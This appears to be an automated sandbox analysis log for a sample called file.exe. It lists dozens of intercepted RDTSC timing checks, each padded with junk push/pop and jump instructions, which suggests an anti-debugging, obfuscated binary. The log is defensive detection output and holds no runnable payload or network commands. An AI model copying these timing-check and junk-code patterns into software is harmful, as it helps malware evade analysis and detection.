          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FDA8 second address: 98FDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FDB4 second address: 98FDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF74D778E9h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99006B second address: 99008E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FAF74D8F586h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99020A second address: 990244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778DDh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FAF74D778E3h 0x00000011 jno 00007FAF74D778D6h 0x00000017 jl 00007FAF74D778D6h 0x0000001d jp 00007FAF74D778D6h 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990383 second address: 990389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990389 second address: 9903B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF74D778E9h 0x00000009 popad 0x0000000a jp 00007FAF74D778DAh 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990947 second address: 99094B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990C20 second address: 990C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990C24 second address: 990C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98F953 second address: 98F959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993B72 second address: 993B77 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993B77 second address: 993B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993830 second address: 99383A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF74D8F586h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99383A second address: 993845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900CEC second address: 900CF6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF74D8F586h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9963C7 second address: 9963D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9966A5 second address: 9966BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF74D8F590h 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99ADAD second address: 99ADBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FAF74D778D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99ADBB second address: 99ADC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B10D second address: 99B111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B288 second address: 99B28E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B407 second address: 99B41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FAF74D778DFh 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B41B second address: 99B433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F592h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B433 second address: 99B437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B578 second address: 99B57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B57C second address: 99B597 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF74D778D6h 0x00000008 jmp 00007FAF74D778E1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B597 second address: 99B5BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FAF74D8F597h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007FAF74D8F58Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0BFF second address: 9A0C0E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF74D778D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0C0E second address: 9A0C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAF74D8F586h 0x0000000a pop esi 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0D7F second address: 9A0DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FAF74D778E7h 0x0000000b jmp 00007FAF74D778DBh 0x00000010 popad 0x00000011 push edi 0x00000012 jmp 00007FAF74D778E8h 0x00000017 jmp 00007FAF74D778E0h 0x0000001c pop edi 0x0000001d popad 0x0000001e pushad 0x0000001f jmp 00007FAF74D778E7h 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A10DA second address: 9A10DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A10DE second address: 9A10F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FAF74D778D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FAF74D778D6h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944C63 second address: 944C85 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007FAF74D8F586h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jnp 00007FAF74D8F586h 0x00000013 push 00000004h 0x00000015 mov cl, dl 0x00000017 push eax 0x00000018 js 00007FAF74D8F590h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1F90 second address: 9A1FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FAF74D778DEh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1FA8 second address: 9A1FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1FAD second address: 9A1FCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FAF74D778D6h 0x00000009 jmp 00007FAF74D778E4h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A53D0 second address: 9A53E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F593h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4ACF second address: 9A4AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4C53 second address: 9A4C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007FAF74D8F586h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A77FB second address: 9A77FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A77FF second address: 9A7805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A7805 second address: 9A780B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ACEFE second address: 9ACF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AD4AC second address: 9AD4B4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AD4B4 second address: 9AD4CD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAF74D8F588h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF74D8F58Bh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AE2A3 second address: 9AE2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAF74D778E5h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AEBCB second address: 9AEBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAF74D8F586h 0x0000000a jmp 00007FAF74D8F58Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 jmp 00007FAF74D8F596h 0x00000018 pop ecx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2F0C second address: 9B2F2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAF74D778E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2F2B second address: 9B2F4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAF74D8F596h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2F4A second address: 9B2F74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778E4h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007FAF74D778DCh 0x00000011 jnc 00007FAF74D778D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2F74 second address: 9B2F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAF74D8F586h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2170 second address: 9B2176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2176 second address: 9B217A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B217A second address: 9B21BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAF74D778D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FAF74D778E5h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007FAF74D778E2h 0x0000001b jmp 00007FAF74D778DAh 0x00000020 push edi 0x00000021 pop edi 0x00000022 jne 00007FAF74D778DEh 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B21BF second address: 9B21CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FAF74D8F586h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B21CB second address: 9B21CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2301 second address: 9B230B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF74D8F58Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B247F second address: 9B2483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2483 second address: 9B2487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2487 second address: 9B24A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF74D778E8h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B24A9 second address: 9B24B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAF74D8F586h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B263D second address: 9B2654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778E3h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2654 second address: 9B2672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FAF74D8F586h 0x0000000e jmp 00007FAF74D8F590h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2C3E second address: 9B2C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FAF74D778DEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FAF74D778DCh 0x00000011 jp 00007FAF74D778D6h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7895 second address: 9B78AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FAF74D8F594h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD908 second address: 9BD90C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD90C second address: 9BD914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDBCE second address: 9BDBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDBD2 second address: 9BDBF2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAF74D8F586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAF74D8F58Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDBF2 second address: 9BDC02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDD36 second address: 9BDD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDD3F second address: 9BDD49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAF74D778D6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDD49 second address: 9BDD4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDEB3 second address: 9BDECB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF74D778D6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FAF74D778DCh 0x00000012 jnp 00007FAF74D778D6h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE31C second address: 9BE322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE322 second address: 9BE331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF74D778DBh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE331 second address: 9BE340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F58Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF3E1 second address: 9BF3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF3E5 second address: 9BF3FD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF74D8F58Fh 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C697C second address: 9C698C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop esi 0x00000008 push esi 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1B0C second address: 9D1B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1B10 second address: 9D1B33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778E9h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1B33 second address: 9D1B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F597h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1B4E second address: 9D1B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1B58 second address: 9D1B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAF74D8F597h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1B7B second address: 9D1B81 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6F73 second address: 9D6F85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FAF74D8F58Ch 0x0000000c jo 00007FAF74D8F586h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD356 second address: 9DD366 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAF74D778D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD366 second address: 9DD36A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB76F second address: 9EB777 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EDC5C second address: 9EDC60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F622F second address: 9F6235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4C6F second address: 9F4C74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4ED1 second address: 9F4EEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FAF74D778E3h 0x0000000c pop eax 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4EEC second address: 9F4EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FAF74D8F586h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F502C second address: 9F5069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FAF74D778E4h 0x0000000b jne 00007FAF74D778D6h 0x00000011 popad 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FAF74D778EDh 0x0000001b jmp 00007FAF74D778E1h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5069 second address: 9F506D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F506D second address: 9F5083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF74D778E1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5320 second address: 9F5335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F591h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5F8B second address: 9F5F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FAF74D778D6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
